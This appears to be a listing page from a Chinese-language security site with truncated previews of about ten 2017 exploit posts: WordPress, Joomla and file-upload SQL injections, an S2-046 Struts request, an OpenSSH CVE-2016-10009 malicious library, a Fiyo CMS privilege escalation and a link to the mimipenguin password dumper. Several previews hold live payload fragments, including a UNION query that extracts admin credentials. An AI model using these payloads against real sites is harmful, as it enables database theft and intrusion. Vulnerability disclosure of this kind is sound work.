WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 - Description: Type user access: register user. $_POST[‘CatID’] is not escaped. http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-inj...

WordPress Huge-IT Video Gallery 2.0.4 SQL注入

Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admi...

WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter 'kc_ad' is vulnerable. 2. Proof of conc...

Linux下密码抓取神器mimipenguin

下载地址:https://github.com/huntergregal/mimipenguin 需要root权限。 以下环境测试通过 Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome K...

S2-046 PoC

POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUg...

Fiyo CMS 2.0.6.1 权限提升漏洞

# Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.f...

st2-045测试工具

相信有不少运维朋友又要加班加点的打补丁了。 本工具仅用作探测自有资产是否存在该漏洞,请勿用于其他用途,否则后果自负。 测试工具: st2-045ihonker专版 修复意见: 升级st2框架

MySQL文件上传-ID参数SQL注入

SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[P...

Joomla Calendar Component SQL注入

POC: http://[Site]/index.php?option=com_blog_calendar&modid=['SQLi]

OpenSSH 7.4代理协议任意库加载漏洞

CVE-2016-10009 $ cat evil_lib.c #include <stdlib.h> __attribute__((constructor)) static void run(void) { // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, // prevent recursion through s...

123456...37

插入图片
返回顶部